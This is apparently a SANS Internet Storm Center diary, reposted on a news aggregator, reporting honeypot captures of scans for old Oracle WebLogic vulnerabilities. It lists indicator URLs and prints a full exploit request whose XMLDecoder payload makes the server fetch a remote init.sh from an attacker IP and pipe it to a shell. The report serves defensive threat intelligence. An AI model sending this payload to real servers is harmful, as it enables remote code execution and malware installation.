[SANS ISC] Scanning for Previous Oracle WebLogic Vulnerabilities, (Sat, Oct 9th)

In the past few weeks, I have captured multiple instance of traffic related to some past Oracle vulnerabilities that have already been patched. The first is related to a RCE (CVE-2017-10271) that can be triggered to execute commands remotely by bypassing the CVE-2017-3506 patch’s limitations. The POST contains an init.sh script which doesn’t appear to be available for download.

The second example is a vulnerability in the Oracle WebLogic Server component related to a Deserialization Vulnerability (CVE-2019-2725).

Traffic Examples

20210929-120748: 192.168.25.9:7001-47.106.191.51:36562 data
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: XX.XX.42.114:7001
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Content-Length: 611
Connection: close
Content-Type: text/xml
Accept-Encoding: gzip
<soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/”><soapenv:Header><work:WorkContext xmlns:work=”http://bea.com/2004/06/soap/workarea/”><java version=”1.8.0_131″ class=”java.beans.XMLDecoder”><void class=”java.lang.ProcessBuilder”><array class=”java.lang.String” length=”3″><void index=”0″><string>/bin/bash</string></void><void index=”1″><string>-c</string></void><void index=”2″><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method=”start”/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

20211007-185800: 192.168.25.9:7001-185.128.41.50:39004 data
POST /_async/AsyncResponseService HTTP/1.1
SOAPAction:
Content-type: text/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Content-Length: 1028
Cache-Control: no-cache
Pragma: no-cache
Host: XX.XX.42.114:7001

Indicators -> /wls-wsat/

45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh
45.9.148.37/cf67356a3333e6999999999/init.sh
185.181.10.234/E5DB0E07C3D7BE80V520/init.sh
helpdeskserver.epelcdn.com/dd210131/init.sh
startbinmanager.epelcdn.com/dd09162/init.sh

[1] https://github.com/s0wr0b1ndef/Oracle-WebLogic-WLS-WSAT
[2] https://www.acunetix.com/vulnerabilities/web/oracle-weblogic-wls-wsat-component-deserialization-rce/
[3] https://nvd.nist.gov/vuln/detail/CVE-2017-3506
[4] https://nvd.nist.gov/vuln/detail/CVE-2017-10271
[5] https://nvd.nist.gov/vuln/detail/CVE-2019-2725
[6] https://nvd.nist.gov/vuln/detail/CVE-2019-2729
[7] https://isc.sans.edu/forums/diary/Update+about+Weblogic+CVE20192725+Exploits+Used+in+the+Wild+Patch+Status/24890
[8] https://isc.sans.edu/forums/diary/Unpatched+Vulnerability+Alert+WebLogic+Zero+Day/24880/
[9] https://isc.sans.edu/forums/diary/Cryptojacking+Targeting+WebLogic+TCP7001/26768

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Source: Read More (SANS Internet Storm Center, InfoCON: green)

You might be interested in …

[ZDNet] iProVPN deal: Get lifetime protection for only $40

All posts, ZDNet

Now you can have worry-free browsing for the rest of your life without putting your identity and data at risk or breaking the bank. Source: Read More (Latest topics for ZDNet in Security)

Read More

[SANS ISC] Microsoft July 2021 Patch Tuesday, (Tue, Jul 13th)

All posts, Sans-ISC

This month we got patches for 117 vulnerabilities. Of these, 13 are critical, 6 were previously disclosed and 4 are being exploited according to Microsoft. The known Printnightmare vulnerability (CVE-2021-34527) is one of the 4 exploited. Microsoft released an out of bound emergency security fix for it (KB5004945) on July 6 but it  is worth stressing […]

Read More

[SecurityWeek] US-UK Gov Warning: SolarWinds Attackers Add Open-Source PenTest Tool to Arsenal

All posts

Agencies in the United States and the United Kingdom on Friday published a joint report providing more details on the activities of the Russian cyberspy group that is believed to be behind the attack on IT management company SolarWinds. The report reveals that the hackers started using the open-source adversary simulation framework Sliver after some […]

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.